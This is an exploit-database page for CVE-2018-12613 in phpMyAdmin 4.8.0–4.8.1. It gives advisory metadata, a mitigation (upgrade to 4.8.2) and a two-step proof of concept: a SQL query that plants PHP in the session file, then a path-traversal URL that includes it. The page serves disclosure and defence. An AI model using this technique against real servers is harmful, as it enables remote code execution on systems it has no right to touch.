header-logo
Suggest Exploit
vendor:
phpMyAdmin
by:
VulnSpy
8.8
CVSS
HIGH
Local File Inclusion to Remote Code Execution
22
CWE
Product Name: phpMyAdmin
Affected Version From: 4.8.0
Affected Version To: 4.8.1
Patch Exists: YES
Related CWE: CVE-2018-12613
CPE: a:phpmyadmin:phpmyadmin:4.8.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2018-12613/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-12613/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-12613/https://www.rapid7.com/db/vulnerabilities/phpmyadmin-cve-2018-12613/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-12613/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=124072https://www.infosecmatter.com/nessus-plugin-library/?id=110722https://www.infosecmatter.com/nessus-plugin-library/?id=110675https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/phpmyadmin_lfi_rcehttps://www.infosecmatter.com/nessus-plugin-library/?id=118178https://www.infosecmatter.com/nessus-plugin-library/?id=118575https://www.infosecmatter.com/nessus-plugin-library/?id=118573https://www.infosecmatter.com/nessus-plugin-library/?id=118678https://www.infosecmatter.com/nessus-plugin-library/?id=111903https://www.infosecmatter.com/nessus-plugin-library/?id=105368
Platforms Tested: php7 mysql5
2018

phpMyAdmin 4.8.1 – Local File Inclusion to Remote Code Execution

This exploit allows an attacker to execute arbitrary code on the vulnerable server by exploiting a Local File Inclusion vulnerability in phpMyAdmin versions 4.8.0 and 4.8.1. The attacker can run a SQL query to include a malicious PHP file in the session file, which can then be accessed via a URL. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of phpMyAdmin, which is 4.8.2. Additionally, ensure that the server is configured securely and that all users have the least privileges necessary to perform their tasks.
Source

Exploit-DB raw data:

# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
# Date: 2018-06-21
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.0, 4.8.1
# Tested on: php7 mysql5
# CVE : CVE-2018-12613

1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

Navigation

Suggest Exploit

Services By CQR